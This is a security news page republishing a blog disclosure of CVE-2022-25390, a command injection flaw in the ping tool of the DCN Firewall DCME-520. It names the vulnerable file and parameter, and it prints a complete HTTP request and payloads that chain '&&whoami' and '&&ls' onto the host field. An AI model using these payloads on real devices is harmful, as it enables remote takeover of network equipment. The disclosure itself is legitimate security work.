Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-25390: DCN Firewall DCME-520 has a Command Execution vulnerability – Adminxe's Blog

DCN Firewall DCME-520 was discovered to contain a remote command execution (RCE) vulnerability via the host parameter in the file /system/tool/ping.php.

CVE
#vulnerability#web#windows#apple#git

**0x00 **Affected component(s)****

Affected:DCN Firewall DCME-520
Affected source code file:/www/function/system/tool/ping.php

**0x01 Vendor of the product(s) and **vulnerability type****

http://www.digitalchina.com/

Command Execution

**0x02 **Attack vector(s)****

Vulnerability file path ‘/function/system/tool/ping.php’,

the’ host ‘parameter passed in is not strictly filtered.

It is directly brought into the command line and bypassed by payload (& &),

resulting in a command execution vulnerability,

which can obtain server permissions.

0x03 Suggest

An issue was discovered in DCN Firewall DCME-520.
There is a Command Execution that can execute any harmful command on the serveron to control the server。

**0x04 **Source code analysis****

path:

/function/system/tool/ping.php

the’ host ‘parameter passed in is not strictly filtered.

It is directly brought into the command line and bypassed by payload (& &),

resulting in a command execution vulnerability.

Command Execution Packet:

POST /function/system/tool/ping.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 148
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/function/system/tool/ping.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: UILanguage=2; PHPSESSID=62913043f1317aec7e2b041dd895ba4b
Connection: close

dcn_test_a_120=525&dcn_test_b_120=283&dcn_test_c_120=790&dcn_test_d=_120&doing=ping&host=114.114.114.114%26%26whoami&proto=&count=1

payload:

host=114.114.114.114&&whoami

host=114.114.114.114&&ls

转载请注明:Adminxe’s Blog » DCN Firewall DCME-520 has a Command Execution vulnerability

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907